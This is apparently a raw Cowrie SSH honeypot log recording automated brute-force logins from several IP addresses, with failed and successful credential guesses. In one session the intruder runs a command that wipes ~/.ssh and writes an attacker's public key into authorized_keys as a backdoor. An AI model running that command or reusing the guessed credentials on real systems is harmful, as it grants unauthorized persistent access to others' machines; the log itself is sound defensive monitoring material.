25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:58:22.842089Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.login.success","username":"root","password":"kramer","message":"login attempt [root/kramer] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:58:23.860525Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:58:24.463207Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:58:24.463885Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:58:24.464661Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:58:24.720843Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:58:25.290090Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:58:25.290824Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:58:25.545384Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:58:25.546269Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":1966,"dst_ip":"1.2.3.4","dst_port":22,"session":"4860df014ca0","protocol":"ssh","message":"New connection: 49.247.35.31:1966 (1.2.3.4:22) [session: 4860df014ca0]","sensor":"my-vps","timestamp":"2025-09-08T13:58:25.834650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:58:25.839042Z","src_ip":"49.247.35.31","session":"4860df014ca0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:58:26.135170Z","src_ip":"49.247.35.31","session":"4860df014ca0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:58:27.296118Z","src_ip":"49.247.35.31","session":"4860df014ca0"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:58:28.598369Z","src_ip":"49.247.35.31","session":"4860df014ca0"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":5650,"dst_ip":"1.2.3.4","dst_port":22,"session":"78bae56c7a53","protocol":"ssh","message":"New connection: 49.247.35.31:5650 (1.2.3.4:22) [session: 78bae56c7a53]","sensor":"my-vps","timestamp":"2025-09-08T13:58:28.858623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:58:28.875201Z","src_ip":"49.247.35.31","session":"78bae56c7a53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:58:29.141724Z","src_ip":"49.247.35.31","session":"78bae56c7a53"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:58:30.205485Z","src_ip":"49.247.35.31","session":"78bae56c7a53"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:58:30.481666Z","src_ip":"49.247.35.31","session":"bccc6387f14d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:58:30.482548Z","src_ip":"49.247.35.31","session":"78bae56c7a53"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":54990,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc4e33ee0a06","protocol":"ssh","message":"New connection: 134.199.174.250:54990 (1.2.3.4:22) [session: fc4e33ee0a06]","sensor":"my-vps","timestamp":"2025-09-08T13:58:34.852640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:58:34.853261Z","src_ip":"134.199.174.250","session":"fc4e33ee0a06"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:58:35.150069Z","src_ip":"134.199.174.250","session":"fc4e33ee0a06"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"password1","message":"login attempt [nagios/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:58:36.042950Z","src_ip":"134.199.174.250","session":"fc4e33ee0a06"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:58:37.369923Z","src_ip":"134.199.174.250","session":"fc4e33ee0a06"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":40446,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e25efa0991d","protocol":"ssh","message":"New connection: 134.199.174.250:40446 (1.2.3.4:22) [session: 7e25efa0991d]","sensor":"my-vps","timestamp":"2025-09-08T13:59:05.026223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:59:05.027167Z","src_ip":"134.199.174.250","session":"7e25efa0991d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:59:05.318213Z","src_ip":"134.199.174.250","session":"7e25efa0991d"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"admin123","message":"login attempt [nagios/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:59:06.193833Z","src_ip":"134.199.174.250","session":"7e25efa0991d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42118,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec159b30a676","protocol":"ssh","message":"New connection: 212.227.235.229:42118 (1.2.3.4:22) [session: ec159b30a676]","sensor":"my-vps","timestamp":"2025-09-08T13:59:07.456942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:59:07.457712Z","src_ip":"212.227.235.229","session":"ec159b30a676"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:59:07.528267Z","src_ip":"134.199.174.250","session":"7e25efa0991d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:59:08.343983Z","src_ip":"212.227.235.229","session":"ec159b30a676"}
{"eventid":"cowrie.login.failed","username":"alex","password":"alex","message":"login attempt [alex/alex] failed","sensor":"my-vps","timestamp":"2025-09-08T13:59:09.283753Z","src_ip":"212.227.235.229","session":"ec159b30a676"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:59:10.516353Z","src_ip":"212.227.235.229","session":"ec159b30a676"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":56640,"dst_ip":"1.2.3.4","dst_port":22,"session":"66d17798a1c8","protocol":"ssh","message":"New connection: 134.199.174.250:56640 (1.2.3.4:22) [session: 66d17798a1c8]","sensor":"my-vps","timestamp":"2025-09-08T13:59:35.076115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:59:35.077319Z","src_ip":"134.199.174.250","session":"66d17798a1c8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:59:35.332057Z","src_ip":"134.199.174.250","session":"66d17798a1c8"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"1234","message":"login attempt [nagios/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:59:36.099842Z","src_ip":"134.199.174.250","session":"66d17798a1c8"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:59:37.557600Z","src_ip":"134.199.174.250","session":"66d17798a1c8"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":52152,"dst_ip":"1.2.3.4","dst_port":22,"session":"89c3865cd660","protocol":"ssh","message":"New connection: 134.199.174.250:52152 (1.2.3.4:22) [session: 89c3865cd660]","sensor":"my-vps","timestamp":"2025-09-08T14:00:06.958349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:00:06.959463Z","src_ip":"134.199.174.250","session":"89c3865cd660"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:00:07.442874Z","src_ip":"134.199.174.250","session":"89c3865cd660"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"123","message":"login attempt [nagios/123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:00:08.469860Z","src_ip":"134.199.174.250","session":"89c3865cd660"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:00:09.866417Z","src_ip":"134.199.174.250","session":"89c3865cd660"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39478,"dst_ip":"1.2.3.4","dst_port":22,"session":"b47727657db4","protocol":"ssh","message":"New connection: 212.227.235.229:39478 (1.2.3.4:22) [session: b47727657db4]","sensor":"my-vps","timestamp":"2025-09-08T14:00:36.681319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:00:36.688268Z","src_ip":"212.227.235.229","session":"b47727657db4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:00:36.913200Z","src_ip":"212.227.235.229","session":"b47727657db4"}
{"eventid":"cowrie.login.failed","username":"adam","password":"111","message":"login attempt [adam/111] failed","sensor":"my-vps","timestamp":"2025-09-08T14:00:38.457443Z","src_ip":"212.227.235.229","session":"b47727657db4"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":46296,"dst_ip":"1.2.3.4","dst_port":22,"session":"9688632eb64c","protocol":"ssh","message":"New connection: 134.199.174.250:46296 (1.2.3.4:22) [session: 9688632eb64c]","sensor":"my-vps","timestamp":"2025-09-08T14:00:39.185343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:00:39.186081Z","src_ip":"134.199.174.250","session":"9688632eb64c"}
